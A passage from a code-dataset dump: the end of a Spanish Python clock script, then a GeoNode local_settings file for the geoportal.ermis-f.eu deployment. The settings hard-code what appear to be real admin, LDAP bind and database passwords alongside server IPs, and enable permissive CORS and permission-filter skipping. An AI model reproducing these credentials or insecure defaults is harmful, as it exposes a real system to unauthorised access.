minutosEn24Hrs>60:\r\n print(\"Error. Inténtalo de nuevo\")\r\n else:\r\n print(\"La hora en formato de 12 horas es: %d:%02d:%02d %s.\" %(horaEn12Hrs[0],minutosEn24Hrs,segundosEn24Hrs,horaEn12Hrs[1]))\r\n\r\n\r\nmain()\r\n","sub_path":"Reloj.py","file_name":"Reloj.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"295208206","text":"# -*- coding: utf-8 -*-\n#########################################################################\n#\n# Copyright (C) 2018 OSGeo\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n#########################################################################\n\n\"\"\" There are 3 ways to override GeoNode settings:\n 1. Using environment variables, if your changes to GeoNode are minimal.\n 2. Creating a downstream project, if you are doing a lot of customization.\n 3. Override settings in a local_settings.py file, legacy.\n\"\"\"\n\nimport ast\nimport os\nfrom urlparse import urlparse, urlunparse\nfrom geonode.settings import *\n\nPROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))\n\nMEDIA_ROOT = os.getenv('MEDIA_ROOT', os.path.join(PROJECT_ROOT, \"uploaded\"))\n\nSTATIC_ROOT = os.getenv('STATIC_ROOT',\n os.path.join(PROJECT_ROOT, \"static_root\")\n )\n\n# SECRET_KEY = '************************'\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = os.getenv('SECRET_KEY', \"{{ secret_key }}\")\n\n\n# per-deployment settings should go here\nSITE_HOST_NAME = os.getenv('SITE_HOST_NAME', 'localhost')\nSITE_HOST_PORT = os.getenv('SITE_HOST_PORT', \"80\")\n\n\n#SITEURL = os.getenv('SITEURL', \"http://%s:%s/\" % (SITE_HOST_NAME, SITE_HOST_PORT))\n\nSITEURL = 'https://geoportal.ermis-f.eu'\n\nSTATIC_ROOT = os.getenv('STATIC_ROOT',\n os.path.join(\"/home/geonode/ermis/ermis\", \"static_root\")\n )\n\n\n# we need hostname for deployed\n_surl = urlparse(SITEURL)\nHOSTNAME = _surl.hostname\n\n\n# add trailing slash to site url. geoserver url will be relative to this\nif not SITEURL.endswith('/'):\n SITEURL = '{}/'.format(SITEURL)\n\nALLOWED_HOSTS = [HOSTNAME, 'localhost','geoportal.ermis-f.eu','kb.ermis-f.eu','84.205.200.65','84.205.200.65:80','195.251.137.130','195.251.137.90','::1']\nPROXY_ALLOWED_HOSTS = (\"127.0.0.1\",'geoportal.ermis-f.eu','kb.ermis-f.eu','84.205.200.65','84.205.200.65:80','195.251.137.130','195.251.137.90','nominatim.openstreetmap.org','b.tile.openstreetmap.org', 'localhost', '::1')\n\nPOSTGIS_VERSION = (2, 0, 7)\n#Define email service on GeoNode\nEMAIL_ENABLE = False\n\nif EMAIL_ENABLE:\n EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n EMAIL_HOST = 'localhost'\n EMAIL_PORT = 25\n EMAIL_HOST_USER = ''\n EMAIL_HOST_PASSWORD = ''\n EMAIL_USE_TLS = False\n DEFAULT_FROM_EMAIL = '{{ project_name }} '\n\nTIME_ZONE = 'Europe/Athens'#'UTC'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'geonode',\n 'USER': 'geonode',\n 'PASSWORD': 'geonode',\n 'HOST': 'localhost',\n 'PORT': '5432',\n 'CONN_TOUT': 900,\n },\n # vector datastore for uploads\n 'datastore': {\n 'ENGINE': 'django.contrib.gis.db.backends.postgis',\n # 'ENGINE': '', # Empty ENGINE name disables\n 'NAME': 'geonode_data',\n 'USER': 'geonode',\n 'PASSWORD': 'geonode',\n 'HOST': 'localhost',\n 'PORT': '5432',\n 'CONN_TOUT': 900,\n }\n}\n\nGEOSERVER_LOCATION = os.getenv(\n 'GEOSERVER_LOCATION', 'https://geoportal.ermis-f.eu/geoserver/'\n)\n\nGEOSERVER_PUBLIC_HOST = os.getenv(\n 'GEOSERVER_PUBLIC_HOST', SITE_HOST_NAME\n)\n\nGEOSERVER_PUBLIC_PORT = os.getenv(\n 'GEOSERVER_PUBLIC_PORT', 80\n)\n\nGEOSERVER_PUBLIC_LOCATION = os.getenv(\n # 'GEOSERVER_PUBLIC_LOCATION', 'http://{}:{}/geoserver/'.format(GEOSERVER_PUBLIC_HOST, GEOSERVER_PUBLIC_PORT)\n\t'GEOSERVER_PUBLIC_LOCATION', 'https://geoportal.ermis-f.eu/geoserver/'\n)\n\nOGC_SERVER_DEFAULT_USER = os.getenv(\n 'GEOSERVER_ADMIN_USER', 'admin'\n)\n\nOGC_SERVER_DEFAULT_PASSWORD = os.getenv(\n 'GEOSERVER_ADMIN_PASSWORD', 'erm_F2018'\n)\n\n# OGC (WMS/WFS/WCS) Server Settings\nOGC_SERVER = {\n 'default': {\n 'BACKEND': 'geonode.geoserver',\n 'LOCATION': GEOSERVER_LOCATION,\n 'LOGIN_ENDPOINT': 'j_spring_oauth2_geonode_login',\n 'LOGOUT_ENDPOINT': 'j_spring_oauth2_geonode_logout',\n # PUBLIC_LOCATION needs to be kept like this because in dev mode\n # the proxy won't work and the integration tests will fail\n # the entire block has to be overridden in the local_settings\n 'PUBLIC_LOCATION': GEOSERVER_PUBLIC_LOCATION,\n 'USER': OGC_SERVER_DEFAULT_USER,\n 'PASSWORD': OGC_SERVER_DEFAULT_PASSWORD,\n 'MAPFISH_PRINT_ENABLED': True,\n 'PRINT_NG_ENABLED': True,\n 'GEONODE_SECURITY_ENABLED': True,\n 'GEOFENCE_SECURITY_ENABLED': True,\n 'GEOGIG_ENABLED': False,\n 'WMST_ENABLED': False,\n 'BACKEND_WRITE_ENABLED': True,\n 'WPS_ENABLED': False,\n 'LOG_FILE': '%s/geoserver/data/logs/geoserver.log' % os.path.abspath(os.path.join(PROJECT_ROOT, os.pardir)),\n # Set to dictionary identifier of database containing spatial data in DATABASES dictionary to enable\n 'DATASTORE': 'datastore',\n 'PG_GEOGIG': False,\n 'TIMEOUT': 60 # number of seconds to allow for HTTP requests\n }\n}\n\n# WARNING: Map Editing is affected by this. GeoExt Configuration is cached for 5 minutes\n# CACHES = {\n# 'default': {\n# 'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',\n# 'LOCATION': '/var/tmp/django_cache',\n# }\n# }\n\n# If you want to enable Mosaics use the following configuration\nUPLOADER = {\n #'BACKEND': 'geonode.rest',\n 'BACKEND': 'geonode.importer',\n 'OPTIONS': {\n 'TIME_ENABLED': True,\n 'MOSAIC_ENABLED': False,\n 'GEOGIG_ENABLED': False,\n },\n 'SUPPORTED_CRS': [\n 'EPSG:4326',\n 'EPSG:3785',\n 'EPSG:3857',\n 'EPSG:32647',\n 'EPSG:32736',\n\t'EPSG:2100'\n ],\n 'SUPPORTED_EXT': [\n '.shp',\n '.csv',\n '.kml',\n '.kmz',\n '.json',\n '.geojson',\n '.tif',\n '.tiff',\n '.geotiff',\n '.gml',\n '.xml'\n ]\n}\n\nCATALOGUE = {\n 'default': {\n # The underlying CSW implementation\n # default is pycsw in local mode (tied directly to GeoNode Django DB)\n 'ENGINE': 'geonode.catalogue.backends.pycsw_local',\n # pycsw in non-local mode\n # 'ENGINE': 'geonode.catalogue.backends.pycsw_http',\n # GeoNetwork opensource\n # 'ENGINE': 'geonode.catalogue.backends.geonetwork',\n # deegree and others\n # 'ENGINE': 'geonode.catalogue.backends.generic',\n\n # The FULLY QUALIFIED base url to the CSW instance for this GeoNode\n 'URL': '%scatalogue/csw' % SITEURL,\n # 'URL': 'http://localhost:8080/geonetwork/srv/en/csw',\n # 'URL': 'http://localhost:8080/deegree-csw-demo-3.0.4/services',\n\n # login credentials (for GeoNetwork)\n 'USER': 'admin',\n 'PASSWORD': 'admin',\n 'ALTERNATES_ONLY': True,\n }\n}\n\n# pycsw settings\nPYCSW = {\n # pycsw configuration\n 'CONFIGURATION': {\n # uncomment / adjust to override server config system defaults\n # 'server': {\n # 'maxrecords': '10',\n # 'pretty_print': 'true',\n # 'federatedcatalogues': 'http://catalog.data.gov/csw'\n # },\n 'metadata:main': {\n 'identification_title': 'GeoNode Catalogue',\n 'identification_abstract': 'GeoNode is an open source platform' \\\n ' that facilitates the creation, sharing, and collaborative use' \\\n ' of geospatial data',\n 'identification_keywords': 'sdi, catalogue, discovery, metadata,' \\\n ' GeoNode',\n 'identification_keywords_type': 'theme',\n 'identification_fees': 'None',\n 'identification_accessconstraints': 'None',\n 'provider_name': 'Organization Name',\n 'provider_url': SITEURL,\n 'contact_name': 'Lastname, Firstname',\n 'contact_position': 'Position Title',\n 'contact_address': 'Mailing Address',\n 'contact_city': 'City',\n 'contact_stateorprovince': 'Administrative Area',\n 'contact_postalcode': 'Zip or Postal Code',\n 'contact_country': 'Country',\n 'contact_phone': '+xx-xxx-xxx-xxxx',\n 'contact_fax': '+xx-xxx-xxx-xxxx',\n 'contact_email': 'Email Address',\n 'contact_url': 'Contact URL',\n 'contact_hours': 'Hours of Service',\n 'contact_instructions': 'During hours of service. Off on ' \\\n 'weekends.',\n 'contact_role': 'pointOfContact',\n },\n 'metadata:inspire': {\n 'enabled': 'true',\n 'languages_supported': 'eng,gre',\n 'default_language': 'eng',\n 'date': 'YYYY-MM-DD',\n 'gemet_keywords': 'Utility and governmental services',\n 'conformity_service': 'notEvaluated',\n 'contact_name': 'Organization Name',\n 'contact_email': 'Email Address',\n 'temp_extent': 'YYYY-MM-DD/YYYY-MM-DD',\n }\n }\n}\n\n# GeoNode javascript client configuration\n\n# default map projection\n# Note: If set to EPSG:4326, then only EPSG:4326 basemaps will work.\nDEFAULT_MAP_CRS = \"EPSG:3857\"\n#DEFAULT_MAP_CRS= \"EPSG:2100\"\n\nDEFAULT_LAYER_FORMAT = \"image/png8\"\n\n# Where should newly created maps be focused?\nDEFAULT_MAP_CENTER = (28,38)\n\n# How tightly zoomed should newly created maps be?\n# 0 = entire world;\n# maximum zoom is between 12 and 15 (for Google Maps, coverage varies by area)\nDEFAULT_MAP_ZOOM = 6\n\n# Default preview library\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'geoext' # DEPRECATED use HOOKSET instead\nGEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.GeoExtHookSet\"\n\n# To enable the REACT based Client enable those\n# INSTALLED_APPS += ('geonode-client', )\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'react' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.ReactHookSet\"\n\n# To enable the Leaflet based Client enable those\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'leaflet' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.LeafletHookSet\"\n\n# To enable the MapStore2 based Client enable those\n# INSTALLED_APPS += ('geonode_mapstore_client', )\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'mapstore' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode_mapstore_client.hooksets.MapStoreHookSet\"\n\n# LEAFLET_CONFIG = {\n# 'TILES': [\n# # Find tiles at:\n# # http://leaflet-extras.github.io/leaflet-providers/preview/\n#\n# # Map Quest\n# ('Map Quest',\n# 'http://otile4.mqcdn.com/tiles/1.0.0/osm/{z}/{x}/{y}.png',\n# 'Tiles Courtesy of MapQuest '\n# '— Map data © '\n# 'OpenStreetMap'),\n# # Stamen toner lite.\n# # ('Watercolor',\n# # 'http://{s}.tile.stamen.com/watercolor/{z}/{x}/{y}.png',\n# # 'Map tiles by Stamen Design, \\\n# # CC BY 3.0 — Map data © \\\n# # OpenStreetMap contributors, \\\n# # CC-BY-SA'),\n# # ('Toner Lite',\n# # 'http://{s}.tile.stamen.com/toner-lite/{z}/{x}/{y}.png',\n# # 'Map tiles by Stamen Design, \\\n# # CC BY 3.0 — Map data © \\\n# # OpenStreetMap contributors, \\\n# # CC-BY-SA'),\n# ],\n# 'PLUGINS': {\n# 'esri-leaflet': {\n# 'js': 'lib/js/esri-leaflet.js',\n# 'auto-include': True,\n# },\n# 'leaflet-fullscreen': {\n# 'css': 'lib/css/leaflet.fullscreen.css',\n# 'js': 'lib/js/Leaflet.fullscreen.min.js',\n# 'auto-include': True,\n# },\n# },\n# 'SRID': 3857,\n# 'RESET_VIEW': False\n# }\n\nALT_OSM_BASEMAPS = ast.literal_eval(os.environ.get('ALT_OSM_BASEMAPS', 'False'))\nCARTODB_BASEMAPS = ast.literal_eval(os.environ.get('CARTODB_BASEMAPS', 'False'))\nSTAMEN_BASEMAPS = ast.literal_eval(os.environ.get('STAMEN_BASEMAPS', 'False'))\nTHUNDERFOREST_BASEMAPS = ast.literal_eval(os.environ.get('THUNDERFOREST_BASEMAPS', 'False'))\n#MAPBOX_ACCESS_TOKEN = os.environ.get('MAPBOX_ACCESS_TOKEN', None)\n#BING_API_KEY = os.environ.get('BING_API_KEY', None)\n#GOOGLE_API_KEY = os.environ.get('GOOGLE_API_KEY', None)\n\n#MAP_BASELAYERS = [{\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer\",\n# \"args\": [\"No background\"],\n# \"name\": \"background\",\n# \"visibility\": False,\n# \"fixed\": True,\n# \"group\":\"background\"\n#},\n # {\n # \"source\": {\"ptype\": \"gxp_olsource\"},\n # \"type\": \"OpenLayers.Layer.XYZ\",\n # \"title\": \"TEST TILE\",\n # \"args\": [\"TEST_TILE\", \"http://test_tiles/tiles/${z}/${x}/${y}.png\"],\n # \"name\": \"background\",\n # \"attribution\": \"© TEST TILE\",\n # \"visibility\": False,\n # \"fixed\": True,\n # \"group\":\"background\"\n # },\n# {\n# \"source\": {\"ptype\": \"gxp_osmsource\"},\n# \"type\": \"OpenLayers.Layer.OSM\",\n# \"name\": \"mapnik\",\n# \"visibility\": True,\n# \"fixed\": True,\n# \"group\": \"background\"\n#}]\n\nMAP_BASELAYERS = [{\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer\",\n \"args\": [\"No background\"],\n \"name\": \"background\",\n \"visibility\": False,\n \"scales\":[100000,50000,20000],\n \"fixed\": True,\n \"group\":\"background\"\n}, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"UNESCO\",\n# \"args\": [\"UNESCO\", \"http://en.unesco.org/tiles/${z}/${x}/${y}.png\"],\n# \"wrapDateLine\": True,\n# \"name\": \"background\",\n# \"attribution\": \"© UNESCO\",\n# \"visibility\": False,\n# \"scales\":[100000,50000,20000],\n# \"fixed\": True,\n# \"group\":\"background\"\n#}, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"UNESCO GEODATA\",\n# \"args\": [\"UNESCO GEODATA\", \"http://en.unesco.org/tiles/geodata/${z}/${x}/${y}.png\"],\n# \"name\": \"background\",\n# \"attribution\": \"© UNESCO\",\n# \"visibility\": False,\n# \"scales\":[100000,50000,20000],\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\":\"background\"\n#}, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"ESRI\",\n# \"args\": [\"ESRI\", \"https://server.arcgisonline.com/ArcGIS/rest/services/World_Topo_Map/MapServer/tile/{z}/{y}/{x}\"],\n# \"name\": \"background\",\n# \"attribution\": \"© ESRI\",\n# \"visibility\": False,\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\":\"background\"\n#}, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"Humanitarian OpenStreetMap\",\n# \"args\": [\"Humanitarian OpenStreetMap\", \"http://a.tile.openstreetmap.fr/hot/${z}/${x}/${y}.png\"],\n# \"name\": \"background\",\n# \"attribution\": \"© OpenStreetMap, Tiles courtesy of Humanitarian OpenStreetMap Team\",\n# \"visibility\": False,\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\":\"background\"\n# }, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"MapBox Satellite Streets\",\n# \"args\": [\"MapBox Satellite Streets\", \"http://api.mapbox.com/styles/v1/mapbox/satellite-streets-v9/tiles/${z}/${x}/${y}?access_token=\"+MAPBOX_ACCESS_TOKEN],\n# \"name\": \"background\",\n# \"attribution\": \"© Mapbox © OpenStreetMap Improve this map\",\n# \"visibility\": False,\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\":\"background\"\n#}, {\n# \"source\": {\"ptype\": \"gxp_olsource\"},\n# \"type\": \"OpenLayers.Layer.XYZ\",\n# \"title\": \"MapBox Streets\",\n# \"args\": [\"MapBox Streets\", \"http://api.mapbox.com/styles/v1/mapbox/streets-v9/tiles/${z}/${x}/${y}?access_token=\"+MAPBOX_ACCESS_TOKEN],\n# \"name\": \"background\",\n# \"attribution\": \"© Mapbox © OpenStreetMap Improve this map\",\n# \"visibility\": False,\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\":\"background\"\n#}, {\n# \"source\": {\"ptype\": \"gxp_osmsource\"},\n# \"type\": \"OpenLayers.Layer.OSM\",\n# \"title\": \"OpenStreetMap\",\n# \"name\": \"mapnik\",\n# \"attribution\": \"© OpenStreetMap contributors\",\n# \"visibility\": True,\n# \"wrapDateLine\": True,\n# \"fixed\": True,\n# \"group\": \"background\"\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer.XYZ\",\n \"title\": \"ESRI Hydro\",\n \"args\": [\"ESRI Hydro\", \"https://server.arcgisonline.com/ArcGIS/rest/services/Ocean_Basemap/MapServer/tile/${z}/${y}/${x}\"],\n \"name\": \"background\",\n \"attribution\": \"© ESRI\",\n \"visibility\": False,\n \"wrapDateLine\": True,\n \"scales\":[100000,50000,20000],\n \"fixed\": True,\n \"group\":\"background\"\n}, {\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer.XYZ\",\n \"title\": \"ESRI Satellite\",\n \"args\": [\"ESRI Satellite\", \"https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/${z}/${y}/${x}\"],\n \"name\": \"background\",\n \"attribution\": \"© ESRI\",\n \"visibility\": False,\n \"wrapDateLine\": True,\n \"scales\":[100000,50000,20000],\n \"fixed\": True,\n \"group\":\"background\"\n}, {\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer.XYZ\",\n \"title\": \"ESRI Topo\",\n \"args\": [\"ESRI Topo\", \"https://server.arcgisonline.com/ArcGIS/rest/services/World_Street_Map/MapServer/tile/${z}/${y}/${x}\"],\n \"name\": \"background\",\n \"attribution\": \"© ESRI\",\n \"visibility\": True,\n \"scales\":[100000,50000,20000],\n \"wrapDateLine\": True,\n \"fixed\": True,\n \"group\":\"background\"\n}]\n\nif 'geonode.geoserver' in INSTALLED_APPS:\n LOCAL_GEOSERVER = {\n \"source\": {\n \"ptype\": \"gxp_wmscsource\",\n \"url\": OGC_SERVER['default']['PUBLIC_LOCATION'] + \"wms\",\n \"restUrl\": \"/gs/rest\"\n }\n }\n baselayers = MAP_BASELAYERS\n MAP_BASELAYERS = [LOCAL_GEOSERVER]\n MAP_BASELAYERS.extend(baselayers)\n\n# To enable the REACT based Client enable those\n# INSTALLED_APPS += ('geonode-client', )\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'react' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.ReactHookSet\"\n\n# To enable the Leaflet based Client enable those\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'leaflet' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.LeafletHookSet\"\n\n# To enable the MapLoom based Client enable those\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'maploom' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode.client.hooksets.MaploomHookSet\"\n#\n# CORS_ORIGIN_WHITELIST = (\n# HOSTNAME\n# )\n\n# To enable the MapStore2 based Client enable those\n# if 'geonode_mapstore_client' not in INSTALLED_APPS:\n# INSTALLED_APPS += (\n# 'mapstore2_adapter',\n# 'geonode_mapstore_client',)\n# GEONODE_CLIENT_LAYER_PREVIEW_LIBRARY = 'mapstore' # DEPRECATED use HOOKSET instead\n# GEONODE_CLIENT_HOOKSET = \"geonode_mapstore_client.hooksets.MapStoreHookSet\"\n# MAPSTORE_DEBUG = False\n\n\n\nif 'geonode.geoserver' in INSTALLED_APPS:\n LOCAL_GEOSERVER = {\n \"type\": \"wms\",\n \"url\": OGC_SERVER['default']['PUBLIC_LOCATION'] + \"wms\",\n \"visibility\": True,\n \"title\": \"Local GeoServer\",\n \"group\": \"background\",\n \"format\": \"image/png8\",\n \"restUrl\": \"/gs/rest\"\n }\n # baselayers = MAPSTORE_BASELAYERS\n # MAPSTORE_BASELAYERS = [LOCAL_GEOSERVER]\n # MAPSTORE_BASELAYERS.extend(baselayers)\n\n# Use kombu broker by default\n# REDIS_URL = 'redis://localhost:6379/1'\n# BROKER_URL = REDIS_URL\n# CELERY_RESULT_BACKEND = REDIS_URL\nCELERYD_HIJACK_ROOT_LOGGER = True\nCELERYD_CONCURENCY = 1\n# Set this to False to run real async tasks\nCELERY_ALWAYS_EAGER = True\nCELERYD_LOG_FILE = None\nCELERY_REDIRECT_STDOUTS = True\nCELERYD_LOG_LEVEL = 1\n\n# Haystack Search Backend Configuration. To enable,\n# first install the following:\n# - pip install django-haystack\n# - pip install elasticsearch==2.4.0\n# - pip install woosh\n# - pip install pyelasticsearch\n# Set HAYSTACK_SEARCH to True\n# Run \"python manage.py rebuild_index\"\n# HAYSTACK_SEARCH = False\n# Avoid permissions prefiltering\nSKIP_PERMS_FILTER = True\n# Update facet counts from Haystack\nHAYSTACK_FACET_COUNTS = True\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.elasticsearch2_backend.Elasticsearch2SearchEngine',\n 'URL': 'http://127.0.0.1:9200/',\n 'INDEX_NAME': 'haystack',\n },\n # 'db': {\n # 'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',\n # 'EXCLUDED_INDEXES': ['thirdpartyapp.search_indexes.BarIndex'],\n # }\n}\nHAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'\n# HAYSTACK_SEARCH_RESULTS_PER_PAGE = 20\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d '\n '%(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(message)s',\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler',\n }\n },\n \"loggers\": {\n \"django\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"geonode\": {\n \"handlers\": [\"console\"], \"level\": \"INFO\", },\n \"geonode.qgis_server\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"gsconfig.catalog\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"owslib\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"pycsw\": {\n \"handlers\": [\"console\"], \"level\": \"INFO\", },\n \"celery\": {\n 'handlers': [\"console\"], 'level': 'ERROR', },\n },\n}\n\n# Additional settings\nCORS_ORIGIN_ALLOW_ALL = True\n\nGEOIP_PATH = \"/usr/local/share/GeoIP\"\n\n# add following lines to your local settings to enable monitoring\nMONITORING_ENABLED = False\n\nif MONITORING_ENABLED:\n if 'geonode.contrib.monitoring' not in INSTALLED_APPS:\n INSTALLED_APPS += ('geonode.contrib.monitoring',)\n if 'geonode.contrib.monitoring.middleware.MonitoringMiddleware' not in MIDDLEWARE_CLASSES:\n MIDDLEWARE_CLASSES += \\\n ('geonode.contrib.monitoring.middleware.MonitoringMiddleware',)\n MONITORING_CONFIG = None\n MONITORING_HOST_NAME = os.getenv(\"MONITORING_HOST_NAME\", HOSTNAME)\n MONITORING_SERVICE_NAME = 'geonode'\n\n#Define email service on GeoNode\nEMAIL_ENABLE = False\n\nif EMAIL_ENABLE:\n EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n EMAIL_HOST = 'localhost'\n EMAIL_PORT = 25\n EMAIL_HOST_USER = ''\n EMAIL_HOST_PASSWORD = ''\n EMAIL_USE_TLS = False\n DEFAULT_FROM_EMAIL = 'Example.com '\n\n# Documents Thumbnails\nUNOCONV_ENABLE = True\n\nif UNOCONV_ENABLE:\n UNOCONV_EXECUTABLE = os.getenv('UNOCONV_EXECUTABLE', '/usr/bin/unoconv')\n UNOCONV_TIMEOUT = os.getenv('UNOCONV_TIMEOUT', 30) # seconds\n\n# Advanced Security Workflow Settings\nACCOUNT_APPROVAL_REQUIRED = False\nCLIENT_RESULTS_LIMIT = 20\nAPI_LIMIT_PER_PAGE = 1000\nFREETEXT_KEYWORDS_READONLY = False\nRESOURCE_PUBLISHING = False\nADMIN_MODERATE_UPLOADS = False\nGROUP_PRIVATE_RESOURCES = False\nGROUP_MANDATORY_RESOURCES = False\nMODIFY_TOPICCATEGORY = True\nUSER_MESSAGES_ALLOW_MULTIPLE_RECIPIENTS = True\nDISPLAY_WMS_LINKS = True\nREGISTRATION_OPEN = False\n# For more information on available settings please consult the Django docs at\n# https://docs.djangoproject.com/en/dev/ref/settings\n# ######################################################################### #\n# account registration settings\nACCOUNT_OPEN_SIGNUP = False\nACCOUNT_APPROVAL_REQUIRED = False\nACCOUNT_EMAIL_CONFIRMATION_EMAIL = False\nACCOUNT_EMAIL_CONFIRMATION_REQUIRED = False\n\n# notification settings\nNOTIFICATION_ENABLED = False\nNOTIFICATION_LANGUAGE_MODULE = \"account.Account\"\n\n# Queue non-blocking notifications.\nNOTIFICATION_QUEUE_ALL = False\n\n# pinax.notifications\n# or notification\nNOTIFICATIONS_MODULE = 'pinax.notifications'\n\n#if NOTIFICATION_ENABLED:\n # INSTALLED_APPS += (NOTIFICATIONS_MODULE, )\n\n\n\n\n\nimport ldap\nfrom django_auth_ldap.config import LDAPSearch,GroupOfNamesType, PosixGroupType,NestedGroupOfNamesType\n\nAUTHENTICATION_BACKENDS = (\n # 'oauth2_provider.backends.OAuth2Backend',\n# 'django_auth_ldap.backend.LDAPBackend',\n 'django.contrib.auth.backends.ModelBackend',\n 'guardian.backends.ObjectPermissionBackend',\n 'django_cas_ng.backends.CASBackend',\n\t # 'allauth.account.auth_backends.AuthenticationBackend'\n)\n\nCAS_SERVER_URL='http://service.ermis-f.eu/'\nCAS_VERSION= '3'\nCAS_LOGOUT_COMPLETELY= True\nCAS_APPLY_ATTRIBUTES_TO_USER = True\nCAS_REDIRECT_URL='https://geoportal.ermis-f.eu'\nCAS_RENAME_ATTRIBUTES = {'first_name': 'first_name','last_name':'last_name', 'organization':'organization'}\n\nSESSION_COOKIE_AGE = 36000\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\n\n\nAUTH_LDAP_SERVER_URI = 'ldap://geoportal.ermis-f.eu:389'\nLDAP_SEARCH_DN = 'cn=users,dc=geoportal,dc=ermis-f,dc=eu'\nAUTH_LDAP_USER = '(uid=%(user)s)'\nAUTH_LDAP_BIND_DN = 'cn=admin,dc=geoportal,dc=ermis-f,dc=eu'\nAUTH_LDAP_BIND_PASSWORD = 'Erm_F2018'\n\t#AUTH_LDAP_BIND_DN = ''\n\t#AUTH_LDAP_BIND_PASSWORD = ''\nAUTH_LDAP_USER_ATTR_MAP = {\n 'first_name': 'first_name','last_name':'last_name','email':'Email'\n}\nAUTH_LDAP_USER_SEARCH = LDAPSearch(LDAP_SEARCH_DN,\n ldap.SCOPE_SUBTREE, AUTH_LDAP_USER)\n\nAUTH_LDAP_GROUP_SEARCH = LDAPSearch(\n 'ou=geonode,dc=geoportal,dc=ermis-f,dc=eu',\n ldap.SCOPE_SUBTREE,\n '(objectClass=groupOfNames)',\n)\nAUTH_LDAP_GROUP_TYPE = NestedGroupOfNamesType()\n\t#AUTH_LDAP_REQUIRE_GROUP = \"ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr\"\n\nAUTH_LDAP_MIRROR_GROUPS=True\nAUTH_LDAP_ALWAYS_UPDATE_USER=True\nAUTH_LDAP_AUTHORIZE_ALL_USERS=True\n\nAUTH_LDAP_USER_FLAGS_BY_GROUP = {\n \"is_active\": \"cn=active,ou=geonode,dc=geoportal,dc=ermis-f,dc=eu\",\n \"is_staff\": \"cn=staff,ou=geonode,dc=geoportal,dc=ermis-f,dc=eu\",\n \"is_superuser\": \"cn=superuser,ou=geonode,dc=geoportal,dc=ermis-f,dc=eu\",\n}\n\nAUTH_LDAP_FIND_GROUP_PERMS = 